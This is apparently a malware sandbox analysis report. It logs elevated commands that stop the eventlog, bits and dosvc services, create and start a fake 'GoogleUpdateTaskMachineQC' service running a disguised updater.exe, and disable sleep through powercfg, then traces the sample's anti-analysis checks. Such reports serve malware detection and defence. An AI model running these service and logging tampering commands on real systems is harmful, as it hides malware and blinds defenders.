                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Has exited:true

                                                                                                                                            General

                                                                                                                                            Target ID:24
                                                                                                                                            Start time:12:12:44
                                                                                                                                            Start date:31/10/2024
                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                            File size:862'208 bytes
                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Has exited:true

                                                                                                                                            General

                                                                                                                                            Target ID:25
                                                                                                                                            Start time:12:12:44
                                                                                                                                            Start date:31/10/2024
                                                                                                                                            Path:C:\Windows\System32\sc.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\system32\sc.exe stop bits
                                                                                                                                            Imagebase:0x7ff76bb80000
                                                                                                                                            File size:72'192 bytes
                                                                                                                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Has exited:true

                                                                                                                                            General

                                                                                                                                            Target ID:26
                                                                                                                                            Start time:12:12:44
                                                                                                                                            Start date:31/10/2024
                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                            File size:862'208 bytes
                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Has exited:true

                                                                                                                                            General

                                                                                                                                            Target ID:27
                                                                                                                                            Start time:12:12:44
                                                                                                                                            Start date:31/10/2024
                                                                                                                                            Path:C:\Windows\System32\sc.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\system32\sc.exe stop dosvc
                                                                                                                                            Imagebase:0x7ff76bb80000
                                                                                                                                            File size:72'192 bytes
                                                                                                                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Has exited:true

                                                                                                                                            General

                                                                                                                                            Target ID:28
                                                                                                                                            Start time:12:12:44
                                                                                                                                            Start date:31/10/2024
                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                            File size:862'208 bytes
                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Has exited:true

                                                                                                                                            General

                                                                                                                                            Target ID:29
                                                                                                                                            Start time:12:12:44
                                                                                                                                            Start date:31/10/2024
                                                                                                                                            Path:C:\Windows\System32\powercfg.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                                                                                            Imagebase:0x7ff6edde0000
                                                                                                                                            File size:96'256 bytes
                                                                                                                                            MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Has exited:true

                                                                                                                                            General

                                                                                                                                            Target ID:30
                                                                                                                                            Start time:12:12:44
                                                                                                                                            Start date:31/10/2024
                                                                                                                                            Path:C:\Windows\System32\powercfg.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                                                                                            Imagebase:0x7ff6edde0000
                                                                                                                                            File size:96'256 bytes
                                                                                                                                            MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Has exited:true

                                                                                                                                            General

                                                                                                                                            Target ID:31
                                                                                                                                            Start time:12:12:44
                                                                                                                                            Start date:31/10/2024
                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                            File size:862'208 bytes
                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Has exited:true

                                                                                                                                            General

                                                                                                                                            Target ID:32
                                                                                                                                            Start time:12:12:44
                                                                                                                                            Start date:31/10/2024
                                                                                                                                            Path:C:\Windows\System32\powercfg.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                                                                                            Imagebase:0x7ff6edde0000
                                                                                                                                            File size:96'256 bytes
                                                                                                                                            MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Has exited:true

                                                                                                                                            General

                                                                                                                                            Target ID:33
                                                                                                                                            Start time:12:12:44
                                                                                                                                            Start date:31/10/2024
                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                            File size:862'208 bytes
                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Has exited:true

                                                                                                                                            General

                                                                                                                                            Target ID:34
                                                                                                                                            Start time:12:12:44
                                                                                                                                            Start date:31/10/2024
                                                                                                                                            Path:C:\Windows\System32\powercfg.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                                                                                            Imagebase:0x7ff6edde0000
                                                                                                                                            File size:96'256 bytes
                                                                                                                                            MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Has exited:true

                                                                                                                                            General

                                                                                                                                            Target ID:35
                                                                                                                                            Start time:12:12:44
                                                                                                                                            Start date:31/10/2024
                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                            File size:862'208 bytes
                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Has exited:true

                                                                                                                                            General

                                                                                                                                            Target ID:36
                                                                                                                                            Start time:12:12:44
                                                                                                                                            Start date:31/10/2024
                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                            File size:862'208 bytes
                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Has exited:true

                                                                                                                                            General

                                                                                                                                            Target ID:37
                                                                                                                                            Start time:12:12:44
                                                                                                                                            Start date:31/10/2024
                                                                                                                                            Path:C:\Windows\System32\sc.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC"
                                                                                                                                            Imagebase:0x7ff76bb80000
                                                                                                                                            File size:72'192 bytes
                                                                                                                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Has exited:true

                                                                                                                                            General

                                                                                                                                            Target ID:38
                                                                                                                                            Start time:12:12:44
                                                                                                                                            Start date:31/10/2024
                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                            File size:862'208 bytes
                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Has exited:true

                                                                                                                                            General

                                                                                                                                            Target ID:39
                                                                                                                                            Start time:12:12:45
                                                                                                                                            Start date:31/10/2024
                                                                                                                                            Path:C:\Windows\System32\sc.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"
                                                                                                                                            Imagebase:0x7ff76bb80000
                                                                                                                                            File size:72'192 bytes
                                                                                                                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Has exited:true

                                                                                                                                            General

                                                                                                                                            Target ID:40
                                                                                                                                            Start time:12:12:45
                                                                                                                                            Start date:31/10/2024
                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                            File size:862'208 bytes
                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Has exited:true

                                                                                                                                            General

                                                                                                                                            Target ID:41
                                                                                                                                            Start time:12:12:45
                                                                                                                                            Start date:31/10/2024
                                                                                                                                            Path:C:\Windows\System32\sc.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\system32\sc.exe stop eventlog
                                                                                                                                            Imagebase:0x7ff76bb80000
                                                                                                                                            File size:72'192 bytes
                                                                                                                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Has exited:true

                                                                                                                                            General

                                                                                                                                            Target ID:42
                                                                                                                                            Start time:12:12:45
                                                                                                                                            Start date:31/10/2024
                                                                                                                                            Path:C:\Windows\System32\sc.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"
                                                                                                                                            Imagebase:0x7ff76bb80000
                                                                                                                                            File size:72'192 bytes
                                                                                                                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Has exited:true

                                                                                                                                            General

                                                                                                                                            Target ID:43
                                                                                                                                            Start time:12:12:45
                                                                                                                                            Start date:31/10/2024
                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                            File size:862'208 bytes
                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Has exited:true

                                                                                                                                            General

                                                                                                                                            Target ID:44
                                                                                                                                            Start time:12:12:45
                                                                                                                                            Start date:31/10/2024
                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                            File size:862'208 bytes
                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Has exited:true

                                                                                                                                            General

                                                                                                                                            Target ID:45
                                                                                                                                            Start time:12:12:45
                                                                                                                                            Start date:31/10/2024
                                                                                                                                            Path:C:\ProgramData\Google\Chrome\updater.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\ProgramData\Google\Chrome\updater.exe
                                                                                                                                            Imagebase:0x7ff67d470000
                                                                                                                                            File size:8'707'480 bytes
                                                                                                                                            MD5 hash:D9A5E741B1F67593422BFB1A165288BB
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Has exited:true

                                                                                                                                            Disassembly

                                                                                                                                            Reset < >

                                                                                                                                              Execution Graph

                                                                                                                                              Execution Coverage:5.6%
                                                                                                                                              Dynamic/Decrypted Code Coverage:45.5%
                                                                                                                                              Signature Coverage:4.6%
                                                                                                                                              Total number of Nodes:2000
                                                                                                                                              Total number of Limit Nodes:28
                                                                                                                                              execution_graph 73437 401190 73444 417a70 GetProcessHeap HeapAlloc GetComputerNameA 73437->73444 73439 40119e 73440 4011cc 73439->73440 73446 4179e0 GetProcessHeap HeapAlloc GetUserNameA 73439->73446 73442 4011b7 73442->73440 73443 4011c4 ExitProcess 73442->73443 73445 417ac9 73444->73445 73445->73439 73447 417a53 73446->73447 73447->73442 73448 416c90 73491 4022a0 73448->73491 73465 4179e0 3 API calls 73466 416cd0 73465->73466 73467 417a70 3 API calls 73466->73467 73468 416ce3 73467->73468 73624 41acc0 73468->73624 73470 416d04 73471 41acc0 4 API calls 73470->73471 73472 416d0b 73471->73472 73473 41acc0 4 API calls 73472->73473 73474 416d12 73473->73474 73475 41acc0 4 API calls 73474->73475 73476 416d19 73475->73476 73477 41acc0 4 API calls 73476->73477 73478 416d20 73477->73478 73632 41abb0 73478->73632 73480 416dac 73636 416bc0 GetSystemTime 73480->73636 73481 416d29 73481->73480 73483 416d62 OpenEventA 73481->73483 73485 416d95 CloseHandle Sleep 73483->73485 73486 416d79 73483->73486 73488 416daa 73485->73488 73490 416d81 CreateEventA 73486->73490 73488->73481 73490->73480 73834 404610 17 API calls 73491->73834 73493 4022b4 73494 404610 34 API calls 73493->73494 73495 4022cd 73494->73495 73496 404610 34 API calls 73495->73496 73497 4022e6 73496->73497 73498 404610 34 API calls 73497->73498 73499 4022ff 73498->73499 73500 404610 34 API calls 73499->73500 73501 402318 73500->73501 73502 404610 34 API calls 73501->73502 73503 402331 73502->73503 73504 404610 34 API calls 73503->73504 73505 40234a 73504->73505 73506 404610 34 API calls 73505->73506 73507 402363 73506->73507 73508 404610 34 API calls 73507->73508 73509 40237c 73508->73509 73510 404610 34 API calls 73509->73510 73511 402395 73510->73511 73512 404610 34 API calls 73511->73512 73513 4023ae 73512->73513 73514 404610 34 API calls 73513->73514 73515 4023c7 73514->73515 73516 404610 34 API calls 73515->73516 73517 4023e0 73516->73517 73518 404610 34 API calls 73517->73518 73519 4023f9 73518->73519 73520 404610 34 API calls 73519->73520 73521 402412 73520->73521 73522 404610 34 API calls 73521->73522 73523 40242b 73522->73523 73524 404610 34 API calls 73523->73524 73525 402444 73524->73525 73526 404610 34 API calls 73525->73526 73527 40245d 73526->73527 73528 404610 34 API calls 73527->73528 73529 402476 73528->73529 73530 404610 34 API calls 73529->73530 73531 40248f 73530->73531 73532 404610 34 API calls 73531->73532 73533 4024a8 73532->73533 73534 404610 34 API calls 73533->73534 73535 4024c1 73534->73535 73536 404610 34 API calls 73535->73536 73537 4024da 73536->73537 73538 404610 34 API calls 73537->73538 73539 4024f3 73538->73539 73540 404610 34 API calls 73539->73540 73541 40250c 73540->73541 73542 404610 34 API calls 73541->73542 73543 402525 73542->73543 73544 404610 34 API calls 73543->73544 73545 40253e 73544->73545 73546 404610 34 API calls 73545->73546 73547 402557 73546->73547 73548 404610 34 API calls 73547->73548 73549 402570 73548->73549 73550 404610 34 API calls 73549->73550 73551 402589 73550->73551 73552 404610 34 API calls 73551->73552 73553 4025a2 73552->73553 73554 404610 34 API calls 73553->73554 73555 4025bb 73554->73555 73556 404610 34 API calls 73555->73556 73557 4025d4 73556->73557 73558 404610 34 API calls 73557->73558 73559 4025ed 73558->73559 73560 404610 34 API calls 73559->73560 73561 402606 73560->73561 73562 404610 34 API calls 73561->73562 73563 40261f 73562->73563 73564 404610 34 API calls 73563->73564 73565 402638 73564->73565 73566 404610 34 API calls 73565->73566 73567 402651 73566->73567 73568 404610 34 API calls 73567->73568 73569 40266a 73568->73569 73570 404610 34 API calls 73569->73570 73571 402683 73570->73571 73572 404610 34 API calls 73571->73572 73573 40269c 73572->73573 73574 404610 34 API calls 73573->73574 73575 4026b5 73574->73575 73576 404610 34 API calls 73575->73576 73577 4026ce 73576->73577 73578 419bb0 73577->73578 73838 419aa0 GetPEB 73578->73838 73580 419bb8 73581 419de3 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 73580->73581 73582 419bca 73580->73582 73583 419e44 GetProcAddress 73581->73583 73584 419e5d 73581->73584 73585 419bdc 21 API calls 73582->73585 73583->73584 73586 419e96 73584->73586 73587 419e66 GetProcAddress GetProcAddress 73584->73587 73585->73581 73588 419eb8 73586->73588 73589 419e9f GetProcAddress 73586->73589 73587->73586 73590 419ec1 GetProcAddress 73588->73590 73591 419ed9 73588->73591 73589->73588 73590->73591 73592 416ca0 73591->73592 73593 419ee2 GetProcAddress GetProcAddress 73591->73593 73594 41aa50 73592->73594 73593->73592 73595 41aa60 73594->73595 73596 416cad 73595->73596 73597 41aa8e lstrcpy 73595->73597 73598 4011d0 73596->73598 73597->73596 73599 4011e8 73598->73599 73600 401217 73599->73600 73601 40120f ExitProcess 73599->73601 73602 401160 GetSystemInfo 73600->73602 73603 401184 73602->73603 73604 40117c ExitProcess 73602->73604 73605 401110 GetCurrentProcess VirtualAllocExNuma 73603->73605 73606 401141 ExitProcess 73605->73606 73607 401149 73605->73607 73839 4010a0 VirtualAlloc 73607->73839 73610 401220 73843 418b40 73610->73843 73613 401249 __aulldiv 73614 40129a 73613->73614 73615 401292 ExitProcess 73613->73615 73616 416a10 GetUserDefaultLangID 73614->73616 73617 416a73 GetUserDefaultLCID 73616->73617 73618 416a32 73616->73618 73617->73465 73618->73617 73619 416a61 ExitProcess 73618->73619 73620 416a43 ExitProcess 73618->73620 73621 416a57 ExitProcess 73618->73621 73622 416a6b ExitProcess 73618->73622 73623 416a4d ExitProcess 73618->73623 73622->73617 73845 41aa20 73624->73845 73626 41acd1 lstrlenA 73628 41acf0 73626->73628 73627 41ad28 73846 41aab0 73627->73846 73628->73627 73630 41ad0a lstrcpy lstrcatA 73628->73630 73630->73627 73631 41ad34 73631->73470 73633 41abcb 73632->73633 73634 41ac1b 73633->73634 73635 41ac09 lstrcpy 73633->73635 73634->73481 73635->73634 73850 416ac0 73636->73850 73638 416c2e 73639 416c38 sscanf 73638->73639 73879 41ab10 73639->73879 73641 416c4a SystemTimeToFileTime SystemTimeToFileTime 73642 416c80 73641->73642 73643 416c6e 73641->73643 73645 415d60 73642->73645 73643->73642 73644 416c78 ExitProcess 73643->73644 73646 415d6d 73645->73646 73647 41aa50 lstrcpy 73646->73647 73648 415d7e 73647->73648 73881 41ab30 lstrlenA 73648->73881 73651 41ab30 2 API calls 73652 415db4 73651->73652 73653 41ab30 2 API calls 73652->73653 73654 415dc4 73653->73654 73885 416680 73654->73885 73657 41ab30 2 API calls 73658 415de3 73657->73658 73659 41ab30 2 API calls 73658->73659 73660 415df0 73659->73660 73661 41ab30 2 API calls 73660->73661 73662 415dfd 73661->73662 73663 41ab30 2 API calls 73662->73663 73664 415e49 73663->73664 73894 4026f0 73664->73894 73672 415f13 73673 416680 lstrcpy 73672->73673 73674 415f25 73673->73674 73675 41aab0 lstrcpy 73674->73675 73676 415f42 73675->73676 73677 41acc0 4 API calls 73676->73677 73678 415f5a 73677->73678 73679 41abb0 lstrcpy 73678->73679 73680 415f66 73679->73680 73681 41acc0 4 API calls 73680->73681 73682 415f8a 73681->73682 73683 41abb0 lstrcpy 73682->73683 73684 415f96 73683->73684 73685 41acc0 4 API calls 73684->73685 73686 415fba 73685->73686 73687 41abb0 lstrcpy 73686->73687 73688 415fc6 73687->73688 73689 41aa50 lstrcpy 73688->73689 73690 415fee 73689->73690 74620 417690 GetWindowsDirectoryA 73690->74620 73693 41aab0 lstrcpy 73694 416008 73693->73694 74630 4048d0 73694->74630 73696 41600e 74775 4119f0 73696->74775 73698 416016 73699 41aa50 lstrcpy 73698->73699 73700 416039 73699->73700 73701 401590 lstrcpy 73700->73701 73702 41604d 73701->73702 74795 4059b0 73702->74795 73704 416053 74941 411280 73704->74941 73706 41605e 73707 41aa50 lstrcpy 73706->73707 73708 416082 73707->73708 73709 401590 lstrcpy 73708->73709 73710 416096 73709->73710 73711 4059b0 39 API calls 73710->73711 73712 41609c 73711->73712 74948 410fc0 73712->74948 73714 4160a7 73715 41aa50 lstrcpy 73714->73715 73716 4160c9 73715->73716 73717 401590 lstrcpy 73716->73717 73718 4160dd 73717->73718 73719 4059b0 39 API calls 73718->73719 73720 4160e3 73719->73720 74958 411170 73720->74958 73722 4160ee 73723 401590 lstrcpy 73722->73723 73724 416105 73723->73724 74966 411c60 73724->74966 73726 41610a 73727 41aa50 lstrcpy 73726->73727 73728 416126 73727->73728 75310 405000 GetProcessHeap RtlAllocateHeap InternetOpenA 73728->75310 73730 41612b 73731 401590 lstrcpy 73730->73731 73732 4161ab 73731->73732 75318 4108a0 73732->75318 73835 4046e7 73834->73835 73836 4046fc 11 API calls 73835->73836 73837 40479f 6 API calls 73835->73837 73836->73835 73837->73493 73838->73580 73841 4010c2 codecvt 73839->73841 73840 4010fd 73840->73610 73841->73840 73842 4010e2 VirtualFree 73841->73842 73842->73840 73844 401233 GlobalMemoryStatusEx 73843->73844 73844->73613 73845->73626 73847 41aad2 73846->73847 73848 41aafc 73847->73848 73849 41aaea lstrcpy 73847->73849 73848->73631 73849->73848 73851 41aa50 lstrcpy 73850->73851 73852 416ad3 73851->73852 73853 41acc0 4 API calls 73852->73853 73854 416ae5 73853->73854 73855 41abb0 lstrcpy 73854->73855 73856 416aee 73855->73856 73857 41acc0 4 API calls 73856->73857 73858 416b07 73857->73858 73859 41abb0 lstrcpy 73858->73859 73860 416b10 73859->73860 73861 41acc0 4 API calls 73860->73861 73862 416b2a 73861->73862 73863 41abb0 lstrcpy 73862->73863 73864 416b33 73863->73864 73865 41acc0 4 API calls 73864->73865 73866 416b4c 73865->73866 73867 41abb0 lstrcpy 73866->73867 73868 416b55 73867->73868 73869 41acc0 4 API calls 73868->73869 73870 416b6f 73869->73870 73871 41abb0 lstrcpy 73870->73871 73872 416b78 73871->73872 73873 41acc0 4 API calls 73872->73873 73874 416b93 73873->73874 73875 41abb0 lstrcpy 73874->73875 73876 416b9c 73875->73876 73877 41aab0 lstrcpy 73876->73877 73878 416bb0 73877->73878 73878->73638 73880 41ab22 73879->73880 73880->73641 73882 41ab4f 73881->73882 73883 415da4 73882->73883 73884 41ab8b lstrcpy 73882->73884 73883->73651 73884->73883 73886 41abb0 lstrcpy 73885->73886 73887 416693 73886->73887 73888 41abb0 lstrcpy 73887->73888 73889 4166a5 73888->73889 73890 41abb0 lstrcpy 73889->73890 73891 4166b7 73890->73891 73892 41abb0 lstrcpy 73891->73892 73893 415dd6 73892->73893 73893->73657 73895 404610 34 API calls 73894->73895 73896 402704 73895->73896 73897 404610 34 API calls 73896->73897 73898 402727 73897->73898 73899 404610 34 API calls 73898->73899 73900 402740 73899->73900 73901 404610 34 API calls 73900->73901 73902 402759 73901->73902 73903 404610 34 API calls 73902->73903 73904 402786 73903->73904 73905 404610 34 API calls 73904->73905 73906 40279f 73905->73906 73907 404610 34 API calls 73906->73907 73908 4027b8 73907->73908 73909 404610 34 API calls 73908->73909 73910 4027e5 73909->73910 73911 404610 34 API calls 73910->73911 73912 4027fe 73911->73912 73913 404610 34 API calls 73912->73913 73914 402817 73913->73914 73915 404610 34 API calls 73914->73915 73916 402830 73915->73916 73917 404610 34 API calls 73916->73917 73918 402849 73917->73918 73919 404610 34 API calls 73918->73919 73920 402862 73919->73920 73921 404610 34 API calls 73920->73921 73922 40287b 73921->73922 73923 404610 34 API calls 73922->73923 73924 402894 73923->73924 73925 404610 34 API calls 73924->73925 73926 4028ad 73925->73926 73927 404610 34 API calls 73926->73927 73928 4028c6 73927->73928 73929 404610 34 API calls 73928->73929 73930 4028df 73929->73930 73931 404610 34 API calls 73930->73931 73932 4028f8 73931->73932 73933 404610 34 API calls 73932->73933 73934 402911 73933->73934 73935 404610 34 API calls 73934->73935 73936 40292a 73935->73936 73937 404610 34 API calls 73936->73937 73938 402943 73937->73938 73939 404610 34 API calls 73938->73939 73940 40295c 73939->73940 73941 404610 34 API calls 73940->73941 73942 402975 73941->73942 73943 404610 34 API calls 73942->73943 73944 40298e 73943->73944 73945 404610 34 API calls 73944->73945 73946 4029a7 73945->73946 73947 404610 34 API calls 73946->73947 73948 4029c0 73947->73948 73949 404610 34 API calls 73948->73949 73950 4029d9 73949->73950 73951 404610 34 API calls 73950->73951 73952 4029f2 73951->73952 73953 404610 34 API calls 73952->73953 73954 402a0b 73953->73954 73955 404610 34 API calls 73954->73955 73956 402a24 73955->73956 73957 404610 34 API calls 73956->73957 73958 402a3d 73957->73958 73959 404610 34 API calls 73958->73959 73960 402a56 73959->73960 73961 404610 34 API calls 73960->73961 73962 402a6f 73961->73962 73963 404610 34 API calls 73962->73963 73964 402a88 73963->73964 73965 404610 34 API calls 73964->73965 73966 402aa1 73965->73966 73967 404610 34 API calls 73966->73967 73968 402aba 73967->73968 73969 404610 34 API calls 73968->73969 73970 402ad3 73969->73970 73971 404610 34 API calls 73970->73971 73972 402aec 73971->73972 73973 404610 34 API calls 73972->73973 73974 402b05 73973->73974 73975 404610 34 API calls 73974->73975 73976 402b1e 73975->73976 73977 404610 34 API calls 73976->73977 73978 402b37 73977->73978 73979 404610 34 API calls 73978->73979 73980 402b50 73979->73980 73981 404610 34 API calls 73980->73981 73982 402b69 73981->73982 73983 404610 34 API calls 73982->73983 73984 402b82 73983->73984 73985 404610 34 API calls 73984->73985 73986 402b9b 73985->73986 73987 404610 34 API calls 73986->73987 73988 402bb4 73987->73988 73989 404610 34 API calls 73988->73989 73990 402bcd 73989->73990 73991 404610 34 API calls 73990->73991 73992 402be6 73991->73992 73993 404610 34 API calls 73992->73993 73994 402bff 73993->73994 73995 404610 34 API calls 73994->73995 73996 402c18 73995->73996 73997 404610 34 API calls 73996->73997 73998 402c31 73997->73998 73999 404610 34 API calls 73998->73999 74000 402c4a 73999->74000 74001 404610 34 API calls 74000->74001 74002 402c63 74001->74002 74003 404610 34 API calls 74002->74003 74004 402c7c 74003->74004 74005 404610 34 API calls 74004->74005 74006 402c95 74005->74006 74007 404610 34 API calls 74006->74007 74008 402cae 74007->74008 74009 404610 34 API calls 74008->74009 74010 402cc7 74009->74010 74011 404610 34 API calls 74010->74011 74012 402ce0 74011->74012 74013 404610 34 API calls 74012->74013 74014 402cf9 74013->74014 74015 404610 34 API calls 74014->74015 74016 402d12 74015->74016 74017 404610 34 API calls 74016->74017 74018 402d2b 74017->74018 74019 404610 34 API calls 74018->74019 74020 402d44 74019->74020 74021 404610 34 API calls 74020->74021 74022 402d5d 74021->74022 74023 404610 34 API calls 74022->74023 74024 402d76 74023->74024 74025 404610 34 API calls 74024->74025 74026 402d8f 74025->74026 74027 404610 34 API calls 74026->74027 74028 402da8 74027->74028 74029 404610 34 API calls 74028->74029 74030 402dc1 74029->74030 74031 404610 34 API calls 74030->74031 74032 402dda 74031->74032 74033 404610 34 API calls 74032->74033 74034 402df3 74033->74034 74035 404610 34 API calls 74034->74035 74036 402e0c 74035->74036 74037 404610 34 API calls 74036->74037 74038 402e25 74037->74038 74039 404610 34 API calls 74038->74039 74040 402e3e 74039->74040 74041 404610 34 API calls 74040->74041 74042 402e57 